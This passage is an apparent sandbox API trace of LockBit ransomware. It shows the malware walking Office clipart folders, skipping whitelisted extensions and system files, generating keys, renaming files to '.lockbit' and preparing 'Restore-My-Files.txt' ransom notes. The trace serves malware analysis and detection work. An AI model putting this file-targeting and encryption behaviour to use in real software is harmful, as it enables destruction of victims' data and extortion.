lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.875] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00017_.WMF") returned -1 [0173.875] lstrcmpiW (lpString1="ntldr", lpString2="SO00017_.WMF") returned -1 [0173.875] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00017_.WMF") returned -1 [0173.875] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00017_.WMF") returned -1 [0173.875] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00017_.WMF") returned -1 [0173.875] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00017_.WMF") returned 1 [0173.875] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00017_.WMF") returned -1 [0173.876] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.876] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00017_.WMF") returned=".WMF" [0173.876] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.876] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.876] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.877] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.877] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.877] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.877] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00017_.WMF.lockbit") returned 72 [0173.877] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00017_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00017_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.881] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.881] malloc (_Size=0x40068) returned 0x3d70450 [0173.881] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=13994) returned 1 [0173.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.881] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.881] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.881] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.884] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00017_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00017_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.884] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.884] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.885] free (_Block=0x1fa2ed8) [0173.885] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00017_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.885] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.885] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc775b700, ftCreationTime.dwHighDateTime=0x1bd4af7, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc775b700, ftLastWriteTime.dwHighDateTime=0x1bd4af7, nFileSizeHigh=0x0, nFileSizeLow=0x32f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00018_.WMF", cAlternateFileName="")) returned 1 [0173.885] lstrcmpiW (lpString1=".", lpString2="SO00018_.WMF") returned -1 [0173.885] lstrcmpiW (lpString1="..", lpString2="SO00018_.WMF") returned -1 [0173.885] PathFindExtensionW (pszPath="SO00018_.WMF") returned=".WMF" [0173.885] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.885] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.886] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.886] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00018_.WMF") returned -1 [0173.887] lstrcmpiW (lpString1="ntldr", lpString2="SO00018_.WMF") returned -1 [0173.887] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00018_.WMF") returned -1 [0173.887] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00018_.WMF") returned -1 [0173.887] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00018_.WMF") returned -1 [0173.887] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00018_.WMF") returned 1 [0173.887] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00018_.WMF") returned -1 [0173.887] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.887] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00018_.WMF") returned=".WMF" [0173.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.887] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.887] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.888] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.888] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00018_.WMF.lockbit") returned 72 [0173.888] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00018_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00018_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0173.889] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.889] malloc (_Size=0x40068) returned 0x3ef0008 [0173.889] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=13046) returned 1 [0173.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.889] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0173.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0173.890] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00018_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00018_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.894] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.894] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.895] free (_Block=0x1fa2ed8) [0173.895] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00018_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.895] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.895] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x419f3f00, ftCreationTime.dwHighDateTime=0x1bd4aea, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x419f3f00, ftLastWriteTime.dwHighDateTime=0x1bd4aea, nFileSizeHigh=0x0, nFileSizeLow=0x7a80, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00152_.WMF", cAlternateFileName="")) returned 1 [0173.895] lstrcmpiW (lpString1=".", lpString2="SO00152_.WMF") returned -1 [0173.895] lstrcmpiW (lpString1="..", lpString2="SO00152_.WMF") returned -1 [0173.896] PathFindExtensionW (pszPath="SO00152_.WMF") returned=".WMF" [0173.896] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.896] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.897] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.897] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00152_.WMF") returned -1 [0173.897] lstrcmpiW (lpString1="ntldr", lpString2="SO00152_.WMF") returned -1 [0173.897] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00152_.WMF") returned -1 [0173.897] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00152_.WMF") returned -1 [0173.897] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00152_.WMF") returned -1 [0173.897] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00152_.WMF") returned 1 [0173.897] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00152_.WMF") returned -1 [0173.897] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.898] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00152_.WMF") returned=".WMF" [0173.898] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.898] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.898] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.899] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.899] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.899] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.899] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00152_.WMF.lockbit") returned 72 [0173.899] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00152_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0173.900] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.900] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.900] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31360) returned 1 [0173.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.901] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00152_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00152_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.905] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.905] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.906] free (_Block=0x1fa2ed8) [0173.906] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00152_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.906] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" 